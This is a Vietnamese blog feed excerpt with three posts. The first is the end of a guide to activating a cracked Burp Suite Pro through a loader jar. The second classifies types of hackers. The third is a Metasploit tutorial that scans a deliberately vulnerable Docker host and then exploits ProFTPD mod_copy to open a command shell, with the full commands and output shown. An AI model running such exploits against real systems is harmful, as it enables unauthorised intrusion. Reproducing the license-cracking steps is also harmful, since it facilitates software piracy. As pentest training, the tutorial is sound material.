<p>Click &#8220;<strong>Copy request</strong>&#8220;, and dán lại vào mục &#8220;<strong>Activation Request </strong>của Loader</p>
<p>Copy dòng &#8220;<strong>Activation Response</strong>&#8221; vào lại <strong>Manual Activation</strong>, click &#8220;<strong>Paste response</strong>&#8220;, và click &#8220;<strong>Next</strong>&#8221;</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/4-activation-response.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2019/11/4-activation-response.jpg" alt="Activation Response burp suite" width="990" height="346" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 12"></a></p>
<p>Sau sẽ xuất hiện thông báo Active Burp Suite thành công.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/actived.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2019/11/actived.jpg" alt="Active Burp Suite" width="342" height="80" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 13"></a></p>
<p>Sửa lỗi Burp suite không mở được:</p>
<p>Mở CMD trỏ về thư mục vừa tải về đã giải nén</p>
<p>Nhập lệnh vào CMD:<br />
<code>java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2022.11.jar -noverify -jar burpsuite_pro_v2022.11.jar</code></p>
<p>Chờ đến khi xuất hiện cửa sổ Enter License Key</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2019/11/1-burp-suite-license-key-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2019/11/1-burp-suite-license-key-1.jpg" alt="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 2" width="551" height="293" title="Download Burp Suite 2024 Pro Full Key - Cách Active bản quyền 14"></a></p>
<p>Vậy là bạn đã kích hoạt thành công Burp Suite 2022.11 mới nhất.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Burp Suite có yêu cầu cấu hình máy tính cụ thể nào không?</h3>
<p>Burp Suite chạy trên nền Java, vì vậy máy tính của bạn cần cài đặt Java trước.  Các yêu cầu cấu hình cụ thể khác phụ thuộc vào phiên bản Burp Suite và tính năng bạn sử dụng.  Tham khảo trang chủ PortSwigger để biết thông tin chi tiết.</p>
<h3>Tôi có thể sử dụng Burp Suite cho mục đích cá nhân không?</h3>
<p>Việc sử dụng Burp Suite phụ thuộc vào mục đích và tuân thủ các điều khoản sử dụng của nhà phát triển.  Hãy đảm bảo sử dụng công cụ này một cách có trách nhiệm và tuân thủ pháp luật.</p>
<h3>Nếu gặp sự cố trong quá trình cài đặt và kích hoạt, tôi nên làm gì?</h3>
<p>Hãy kiểm tra lại từng bước hướng dẫn cài đặt và kích hoạt một cách cẩn thận.  Nếu vẫn gặp sự cố, hãy tìm kiếm câu trả lời trên diễn đàn hỗ trợ của PortSwigger hoặc các cộng đồng liên quan đến bảo mật.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/download-burp-suite-2024-full/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
			</item>
		<item>
		<title>Phân loại các Hacker hiện nay trên Internet</title>
		<link>https://anonyviet.com/phan-loai-cac-hacker-hien-nay-tren-internet/</link>
					<comments>https://anonyviet.com/phan-loai-cac-hacker-hien-nay-tren-internet/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 15 Aug 2022 01:36:11 +0000</pubDate>
				<category><![CDATA[Kiến thức]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=43260</guid>

					<description><![CDATA[Hack là gì? Hacking là quá trình xác định và khai thác điểm yếu trong hệ thống mạng để truy cập trái phép vào dữ liệu và tài nguyên hệ thống. Nó cũng có thể được định nghĩa là sự xâm nhập trái phép vào hệ thống thông tin bằng lỗ hổng bảo mật. Ví [&#8230;]]]></description>
										<content:encoded><![CDATA[<h2>Hack là gì?</h2>
<p>Hacking là quá trình xác định và khai thác điểm yếu trong hệ thống mạng để truy cập trái phép vào dữ liệu và tài nguyên hệ thống.</p>
<p>Nó cũng có thể được định nghĩa là sự xâm nhập trái phép vào hệ thống thông tin bằng lỗ hổng bảo mật.</p>
<p>Ví dụ về Hacking: Khai thác điểm yếu của mật khẩu mặc định để truy cập vào Camera/Router</p>
<h2>Ethical Hacking là gì?</h2>
<p>Ethical Hacking &#8211; Hack có đạo đức đôi khi được gọi là Kiểm tra thâm nhập (Pentest) là một hành động xâm nhập vào hệ thống hoặc mạng để tìm ra các mối lỗ hổng trong hệ thống mà &#8220;Hacker xấu&#8221; có thể tìm thấy và khai thác gây mất dữ liệu, tổn thất tài chính hoặc các thiệt hại lớn khác.</p>
<p>Mục đích của Ethical Hacking là cải thiện tính bảo mật của mạng hoặc hệ thống bằng cách sửa các lỗ hổng được tìm thấy. Hacker có &#8220;đạo đức&#8221; có thể sử dụng các phương pháp và công cụ giống như các Hacker &#8220;xấu&#8221; đã sử dụng nhưng được sự cho phép của người quản lý hệ thôsng nhằm mục đích cải thiện bảo mật và bảo vệ hệ thống khỏi các cuộc tấn công từ Hacker khác</p>
<p>Các Hacker có đạo đức sẽ báo cáo tất cả các lỗ hổng và điểm yếu được tìm thấy trong quá trình này cho người quản lý hệ thống.</p>
<h2>Ethical Hacker à ai?</h2>
<p>Một Ethical Hacker hay Hacker có Đạo đức là một chuyên gia có kiến ​​thức và kỹ năng về bảo mật, đồng thời biết cách xác định và khai thác các lỗ hổng trong các hệ thống mục tiêu. Ethical Hacker làm việc với sự cho phép của chủ sở hữu hệ thống. Một Ethical Hacker phải tuân thủ các quy tắc của tổ chức hoặc chủ sở hữu mục tiêu và luật pháp của đất nước và mục đích của họ là đánh giá tình hình an ninh của một tổ chức/hệ thống mục tiêu.</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/08/co-bao-nhieu-loai-hacker.jpg" alt="co bao nhieu loai hacker" width="576" height="379" title="Phân loại các Hacker hiện nay trên Internet 16"></p>
<h1>Có bao nhiêu loại Hacker và mục đích</h1>
<p>Hacker có thể là đứa trẻ 10 tuổi, có thể một sinh viên, một cụ già và <a href="https://anonyviet.com/danh-sach-10-nu-hacker-khet-tieng-va-xinh-dep/">Hacker nữ</a> cũng có rất nhiều trên Internet. Tuy nhiền tùy vào mục đích, chúng ta có thể chia thành các nhóm Hacker như sau:</p>
<h2>1. Hacker Mũ đen: Hacker tội phạm</h2>
<p>Hacker mũ đen (Blackhat) là tội phạm mạng đột nhập vào hệ thống máy tính với mục đích xấu hoặc tội phạm. Hacker mũ đen có lẽ là những gì bạn nghĩ đến khi hình dung về một Hacker hoặc tội phạm mạng thường thấy trên báo, đài. Họ cố gắng tìm ra các lỗ hổng trong hệ thống máy tính và phần mềm để thu lợi bất chính hoặc các mục đích xấu khác.</p>
<p>Những cá nhân này có thể gây tổn hại nghiêm trọng cho các cá nhân và tổ chức như nhau bằng cách đánh cắp dữ liệu cá nhân hoặc nhạy cảm, làm tổn hại toàn bộ hệ thống máy tính hoặc thay đổi các mạng quan trọng.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để kiếm lợi từ việc bán dữ liệu, tống tiền, phá hoại hoặc đánh bóng bản thân.</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Hacker mũ đen gây ra nhiều rủi ro nhất cho các doanh nghiệp mà chúng thường nhắm mục tiêu để đánh cắp dữ liệu nhạy cảm như thông tin tài chính công ty, thông tin nhân sự, khách hàng tổn hại đến uy tín của doanh nghiệp đó</p>
<h2>2. Hacker Mũ trắng: Hacker được ủy quyền</h2>
<p>Tương tự như hacker mũ đen, hacker mũ trắng là những chuyên gia an ninh mạng sử dụng kỹ năng của họ để tìm ra lỗ hổng trong mạng tổ chức và hệ thống máy tính. Tuy nhiên, điểm khác biệt chính là các hacker mũ trắng được phép hack các hệ thống này với mục đích phát hiện các lỗ hổng bảo mật trước khi một hacker tội phạm có thể tìm ra.</p>
<p>Thường được thuê bởi chính phủ hoặc các doanh nghiệp lớn, Hacker mũ trắng xác định và hướng dẫn sửa chữa các lỗ hổng hoặc điểm yếu được tìm thấy trong hệ thống bảo mật của tổ chức để giúp ngăn chặn một cuộc tấn công bên ngoài.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong>: Giúp các doanh nghiệp ngăn chặn các cuộc tấn công an ninh mạng</p>
<h2>3. Hacker Mũ xám: Hacker “Chỉ để giải trí”</h2>
<p>Hacker mũ xám là một chuyên gia an ninh mạng, người tìm mọi cách để xâm nhập vào hệ thống và mạng máy tính, nhưng không có mục đích xấu của hacker mũ đen.</p>
<p>Thông thường, chúng tham gia vào các hoạt động hack vì mục đích thuần túy là tìm ra lỗ hổng trong hệ thống máy tính và thậm chí chúng có thể cho chủ sở hữu biết nếu tìm thấy bất kỳ điểm yếu nào. Tuy nhiên, không phải lúc nào chúng cũng đi theo con đường &#8220;thánh thiện &#8220;nhất khi sử dụng các hoạt động hack &#8211; họ có thể xâm nhập vào hệ thống hoặc mạng mà không có sự cho phép của chủ sở hữu (mặc dù chúng không cố gắng gây ra bất kỳ tổn hại nào).</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ:</strong> Hưởng thụ cá nhân</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Bất kỳ ai không muốn truy cập trái phép vào hệ thống và mạng của họ</p>
<h2>4. Script Kiddies: Những đứa trẻ chỉ gì làm đó</h2>
<p>Script kiddies là không hẵn là Hacker hoặc có thể gọi là Hacker nghiệp dư do  không có trình độ, kỹ năng chuyên môn như những Hacker chuyên nghiệp. Các Script Kiddies chủ yếu là xem các hướng dẫn trên mạng rồi làm theo chứ không hiểu rõ nguyên lý hoạt động như thế nào. Đa số Script Kiddies sử dụng phần mềm độc hại hiện có do các Hacker khác tạo ra để thực hiện các cuộc tấn công mạng hoặc dùng những công cụ DDoS được chia sẻ trên Internet.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong>: Gây gián đoạn tạm thời</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Các tổ chức có hệ thống và mạng không an toàn</p>
<h2>5. Hacker Mũ xanh lá: Đào tạo Hacker</h2>
<p>Hacker mũ xanh lá là một người mới tham gia vào thế giới hack nhưng đang chăm chú tập trung vào việc nâng cao kỹ năng tấn công mạng của họ. Họ chủ yếu tập trung vào việc đạt được kiến ​​thức về cách thực hiện các cuộc tấn công mạng ở cấp độ tương tự như các Hacker mũ đen. Mục đích chính của họ là cuối cùng phát triển thành một hacker chính thức, vì vậy họ dành thời gian tìm kiếm cơ hội học hỏi từ những hacker có kinh nghiệm hơn.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để học cách trở thành một hacker có kinh nghiệm</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Chưa có ai</p>
<h2>6. Hacker Mũ xanh lá dương: Hacker phần mềm được ủy quyền</h2>
<p>Hacker mũ xanh dương được các tổ chức thuê để kiểm tra lỗi một phần mềm hoặc mạng hệ thống mới trước khi nó được phát hành. Vai trò của họ là tìm ra các sơ hở hoặc lỗ hổng bảo mật trong phần mềm mới và khắc phục chúng trước khi nó ra mắt.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để xác định các lỗ hổng trong phần mềm tổ chức mới trước khi nó được phát hành</p>
<h2>7. Hacker Mũ đỏ: Hacker do chính phủ thuê</h2>
<p>Hacker mũ đỏ được các cơ quan chính phủ thuê để phát hiện các lỗ hổng trong hệ thống bảo mật, với trọng tâm cụ thể là tìm kiếm và giải giáp đối trọng lại các Hacker mũ đen. Họ được biết đến là đặc biệt &#8220;tàn nhẫn&#8221; trong việc săn lùng các Hacker mũ đen và thường sử dụng mọi cách có thể để hạ gục chúng. Điều này thường giống như sử dụng chiến thuật tương tự như Hacker mũ đen và sử dụng chúng để chống lại chúng &#8211; sử dụng cùng một phần mềm độc hại, vi rút và các chiến lược khác để xâm nhập máy của họ từ trong ra ngoài.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để tìm và tiêu diệt Hacker mũ đen</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Hacker mũ đen</p>
<h2>8. Hacker được Nhà nước bảo trợ: Phòng chống mối đe dọa quốc tế</h2>
<p>Hacker này được chính phủ của một quốc gia chỉ định để truy cập vào hệ thống máy tính của quốc gia khác. Các kỹ năng an ninh mạng của họ được sử dụng để lấy thông tin bí mật từ các quốc gia khác để chuẩn bị cho một cuộc tấn công tiềm tàng sắp tới, cũng như để nắm bắt các tình huống nhạy cảm có thể gây ra mối đe dọa trong tương lai. Những Hacker này chỉ được thuê bởi các cơ quan chính phủ.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để giám sát và ngăn chặn các mối đe dọa quốc tế</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Hacker và tội phạm quốc tế</p>
<h2>9. Hacker Nội gián</h2>
<p>Hacker nội gián là những cá nhân tạo ra một cuộc tấn công mạng từ bên trong tổ chức mà họ làm việc. Động cơ tấn công của họ có thể khác nhau, từ hành động dựa trên mối hận thù cá nhân mà họ có đối với người mà họ làm việc cho đến việc tìm kiếm và vạch trần hoạt động bất hợp pháp trong tổ chức. Hoặc được công ty đối thủ cài người vào nhằm phá hoại hệ thống.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để lộ hoặc khai thác thông tin bí mật của một tổ chức</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Giám đốc điều hành nội bộ và lãnh đạo doanh nghiệp</p>
<h2>10. Hacker có động cơ chính trị</h2>
<p>Hacker có động cơ chính trị &#8211; Hacktivist là người đột nhập vào các mạng và hệ thống của chính phủ để tạo ra sự chú ý một mục đích chính trị hoặc xã hội &#8211; do đó tại sao cái tên “hacktivist” là một cách chơi chữ của từ &#8220;activist&#8221; &#8211; &#8220;nhà hoạt động&#8221;.  Họ sử dụng hack như một hình thức phản đối, lấy thông tin nhạy cảm của chính phủ, được sử dụng cho các mục đích chính trị hoặc xã hội. Các nhóm hacktivist thường thấy đó là Anonymous, WikiLeaks ..</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ:</strong> Để làm sáng tỏ một nguyên nhân xã hội hoặc chính trị hoặc để đưa ra một tuyên bố chính trị hoặc ý thức hệ)</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Cơ quan chính phủ</p>
<h2>11. Hacker ưu tú: Những Hacker cao cấp nhất</h2>
<p>Hacker tinh nhuệ &#8211; Elite Hacker là người nổi tiếng trong thế giới tội phạm mạng, và được coi là những Hacker có kỹ năng cao trong lĩnh vực an ninh mạng. Họ thường là những người đầu tiên phát hiện ra các phương pháp tấn công zero-day và được biết đến là những chuyên gia trong thế giới hacker.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Để thực hiện các cuộc tấn công mạng zero-day vào các tổ chức và cá nhân</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Các công ty có doanh thu cao</p>
<h2>12. Cryptojacker: Hacker khai thác tiền điện tử</h2>
<p>Cryptojacker được biết là khai thác các lỗ hổng mạng và đánh cắp tài nguyên máy tính như một cách để khai thác tiền điện tử. Chúng phát tán phần mềm độc hại theo nhiều cách khác nhau, thường bằng cách phát tán virus lây nhiễm trên web. Những loại virus và chiến thuật giống như ransomware này được sử dụng để cài mã độc vào hệ thống của nạn nhân, những hệ thống này hoạt động âm thầm trong nền mà nạn nhân không hề hay biết. Sau khi mã được cài đặt, nó sẽ gửi lại kết quả cho hacker.</p>
<p>Cryptojacker rất khó phát hiện, vì mã độc có thể không bị phát hiện trong một thời gian dài. Vì động cơ của họ không phải là đánh cắp dữ liệu của nạn nhân, mà là sử dụng hệ thống của họ như một phương tiện để khai thác tiền điện tử, nên rất khó để truy ra nguồn lây nhiễm khi nó được phát hiện.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong> : Khai thác tiền điện tử</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Bất kỳ cá nhân hoặc tổ chức nào có mạng không an toàn</p>
<h2>13. Gaming Hacker</h2>
<p>Mục đích Gaming Hacker là nhằm vào các đối thủ cạnh tranh trong thế giới game. Với sự bùng nổ của ngành công nghiệp game, không có gì ngạc nhiên khi danh mục Gaming Hacker chuyên biệt đã xuất hiện. Các game thủ chuyên nghiệp có thể chi hàng nghìn đô la cho phần cứng hiệu suất cao và &#8220;nạp tiền&#8221; vào game, và Hacker thường thực hiện các cuộc tấn công nhằm đánh cắp &#8220;tiền trong Game&#8221; của đối thủ cạnh tranh hoặc gây ra các cuộc tấn công từ chối dịch vụ (DDoS) để đối thủ họ bị lag, thua cuộc.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong>: Để thỏa hiệp với các đối thủ chơi game</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Những người chơi game nổi tiếng</p>
<h2>14. Botnet</h2>
<p>Hacker botnet là những người viết các phần mềm độc hại tạo ra các bot để thực hiện các cuộc tấn công số lượng lớn trên nhiều thiết bị nhất có thể, thường nhắm mục tiêu vào Router, Camera và các thiết bị Internet of Things (IoT) khác. Các bot hoạt động bằng cách tìm kiếm các thiết bị không an toàn (hoặc các thiết bị vẫn sử dụng thông tin đăng nhập mặc định) để tự đưa vào. Các botnet có thể được sử dụng trực tiếp bởi hacker đã tạo ra chúng, và cũng được bán dark web cho các Hacker khác sử dụng.</p>
<p><strong>Đ</strong><strong>ộ</strong><strong>ng c</strong><strong>ơ</strong>: Để tấn công DDoS</p>
<p><strong>Ai có nguy c</strong><strong>ơ</strong><strong> cao nh</strong><strong>ấ</strong><strong>t? </strong>Bất kỳ hệ thống mạng có kết nối Internet</p>
<p>Để bảo vệ bạn trước các nguy cơ tấn công mạnh, sự rình rập của Hacker, hãy trang bị cho mình <a href="https://anonyviet.com/watch-your-hack-cam-nang-bao-ve-ban-truoc-hacker/">kiến thức An ninh mạng</a> khi sử dụng máy tính.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Hacker mũ đen khác với Hacker mũ trắng như thế nào?</h3>
<p>Hacker mũ đen (Blackhat) là những tội phạm mạng thực hiện các hoạt động hack với mục đích xấu, như đánh cắp dữ liệu hoặc gây thiệt hại. Hacker mũ trắng (Whitehat), ngược lại, là những chuyên gia an ninh mạng được ủy quyền để tìm và vá lỗi bảo mật trong hệ thống.</p>
<h3>Script Kiddies là ai và họ gây ra mối nguy hiểm gì?</h3>
<p>Script Kiddies là những người nghiệp dư, thiếu kỹ năng chuyên môn, sử dụng các công cụ và mã độc có sẵn trên mạng để thực hiện các cuộc tấn công.  Họ gây ra rủi ro cho các hệ thống có bảo mật yếu.</p>
<h3>Ethical Hacking là gì và tại sao nó lại quan trọng?</h3>
<p>Ethical Hacking (Hacking có đạo đức) là việc sử dụng các kỹ thuật hacking để kiểm tra và cải thiện an ninh mạng của một hệ thống. Nó rất quan trọng vì giúp phát hiện và khắc phục các lỗ hổng bảo mật trước khi hacker mũ đen có thể khai thác chúng.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/phan-loai-cac-hacker-hien-nay-tren-internet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách Quét lỗ hổng bảo mật bằng Metasploit</title>
		<link>https://anonyviet.com/cach-quet-lo-hong-bao-mat-bang-metasploit/</link>
					<comments>https://anonyviet.com/cach-quet-lo-hong-bao-mat-bang-metasploit/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Tue, 02 Aug 2022 23:32:33 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[lỗ hổng bảo mật]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[quét lỗ hổng bảo mật]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=42671</guid>

					<description><![CDATA[Trong quá trình thử nghiệm Kali Nethunter trên OnePlus, mình đã tìm kiếm các công cụ và quy trình làm việc có thể chạy trên một thứ gì đó nhẹ như điện thoại Android. Mình cũng muốn xem mình có thể đi được bao xa mà không cần phải dùng VPS hay Server bên ngoài. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Trong quá trình thử nghiệm Kali Nethunter trên OnePlus, mình đã tìm kiếm các công cụ và quy trình làm việc có thể chạy trên một thứ gì đó nhẹ như điện thoại Android. Mình cũng muốn xem mình có thể đi được bao xa mà không cần phải dùng VPS hay Server bên ngoài.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_-sGG-7EvvTzOBSkhSqe8RQ-1.png" alt="Cách quét lỗ hổng bảo mật bằng Metasploit" width="604" height="568" title="Cách Quét lỗ hổng bảo mật bằng Metasploit 18"></p>
<p>Quét lỗ hổng bảo mật bằng OpenVAS, Nessus hoặc bất kỳ thứ gì khác chạy tốt trên phần cứng nhẹ. Theo kinh nghiệm của mình, một máy quét lỗ hổng chuyên dụng sẽ khá tốn nhiều tài nguyên.</p>
<p>Vì vậy, khi sử dụng Metasploit làm công cụ chính để khai thác phần mềm dễ bị tấn công, mình muốn chia sẻ một số mẹo mà mình đã tìm thấy để thực hiện quét lỗ hổng bảo mật bằng <a href="https://anonyviet.com/cach-su-dung-metasploit-de-tan-cong-mang-co-ban-nhat/">Metasploit</a>.</p>
<h3 id="194a" class="kv kw jj bn kx ky kz la lb lc ld le lf lg lh li lj lk ll lm ln lo lp lq lr ls hk">Nmap + Metasploit</h3>
<p>Gần đây mình đã phát hiện ra rằng bạn có thể sử dụng nmap trực tiếp từ Metasploit bằng cách sử dụng mô-đun <code>db_nmap</code>. Sử dụng mô-đun này khá tốt vì bạn có thể nhận được kết quả được nhập trực tiếp vào Metasploit.</p>
<p>Dưới đây là một ví dụ về lệnh db_nmap trong Metasploit:</p>
<p><code>msf6 &gt; db_nmap -sV 192.168.1.5</code></p>
<p>Đây là kết quả đầu ra (máy chủ này đang chạy <a href="https://hub.docker.com/r/heywoodlh/vulnerable" target="_blank" rel="noopener">container Docker dễ bị tấn công</a>):</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; db_nmap -sV 192.168.1.5
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC
[*] Nmap: Nmap scan report for 192.168.1.5 (192.168.1.5)
[*] Nmap: Host is up (0.12s latency).
[*] Nmap: rDNS record for 192.168.1.5: 192.168.1.5.vultr.com
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT     STATE    SERVICE     VERSION
[*] Nmap: 21/tcp   open     ftp         ProFTPD 1.3.5
[*] Nmap: 22/tcp   open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 25/tcp   filtered smtp
[*] Nmap: 80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: 139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 631/tcp  open     ipp         CUPS 1.7
[*] Nmap: 6667/tcp open     irc         UnrealIRCd
[*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds</pre>
<p>Bây giờ, Metasploit đã biết về các dịch vụ trên máy chủ đó. Kiểm tra bằng lệnh <code class="hj mw mx my mz b">services</code> :</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; services
Services
========
host          port  proto  name         state     info
----          ----  -----  ----         -----     ----
192.168.1.5  21    tcp    ftp          open      ProFTPD 1.3.5
192.168.1.5  22    tcp    ssh          open      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; proto
                                                  col 2.0
192.168.1.5  25    tcp    smtp         filtered
192.168.1.5  80    tcp    http         open      Apache httpd 2.4.7 (Ubuntu)
192.168.1.5  139   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  445   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  631   tcp    ipp          open      CUPS 1.7
192.168.1.5  6667  tcp    irc          open      UnrealIRCd</pre>
<p>Với <code>db_nmap</code>, nó sẽ tự động nhập các lỗ hổng nếu bạn sử dụng bất kỳ tập lệnh quét lỗ hổng nào của nmap.</p>
<p>Đây là một lệnh ví dụ:</p>
<p><code>msf6 &gt; db_nmap -sV --script=vulners.nse 192.168.1.5</code></p>
<p>Sau khi hoàn thành lệnh đó, mình có thể sử dụng lệnh <code>vulns</code> để kiểm tra các khai thác được lưu trữ trong Metasploit đã được phát hiện bằng cách sử dụng nmap:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; vulns
Vulnerabilities
===============
Timestamp                Host          Name                             References
---------                ----          ----                             ----------
2021-08-08 03:55:55 UTC  192.168.1.5  cpe:/a:proftpd:proftpd:1.3.5     CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418
&lt;snipped&gt;</pre>
<p>Bạn có thể thấy có một lỗ hổng mà Metasploit đã khai thác trong đầu ra ở trên của các tệp tin:</p>
<p><code>MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC</code></p>
<p>Vì vậy, hãy khai thác nó:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msf6 &gt; use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) &gt; set RHOSTS 192.168.1.5
RHOSTS =&gt; 192.168.1.5
msf6 exploit(unix/ftp/proftpd_modcopy_exec) &gt; set SITEPATH /var/www/html
SITEPATH =&gt; /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) &gt; set payload cmd/unix/bind_awk 
payload =&gt; cmd/unix/bind_awk
msf6 exploit(unix/ftp/proftpd_modcopy_exec) &gt; run 
[*] 192.168.1.5:80 - 192.168.1.5:21 - Connected to FTP server
[*] 192.168.1.5:80 - 192.168.1.5:21 - Sending copy commands to FTP server
[*] 192.168.1.5:80 - Executing PHP payload /VlrUb.php
[*] Started bind TCP handler against 192.168.1.5:4444
[*] Command shell session 1 opened (0.0.0.0:0 -&gt; 192.168.1.5:4444) at 2021-08-08 04:21:30 +0000</pre>
<p>Shell được tạo bằng cách sử dụng kết quả quét lỗ hổng bảo mật được thực hiện trên điện thoại Android.</p>
<p>Mình khuyên bạn nên sử dụng thêm các tập lệnh quét lỗ hổng nmap với mô-đun <code>db_nmap</code> của Metasploit.</p>
<h3>Quét lỗ hổng ứng dụng web</h3>
<p>Metasploit có một mô-đun quét lỗ hổng ứng dụng web được tích hợp sẵn: WMAP:</p>
<p><a class="au nk" href="https://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner/" target="_blank" rel="noopener ugc nofollow">WMAP Web Scanner</a></p>
<p>Tài liệu về WMAP trong repo Github cũ của người khác giải thích điều khiến WMAP trở nên đặc biệt:</p>
<p><a href="https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt" target="_blank" rel="noopener">https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt</a></p>
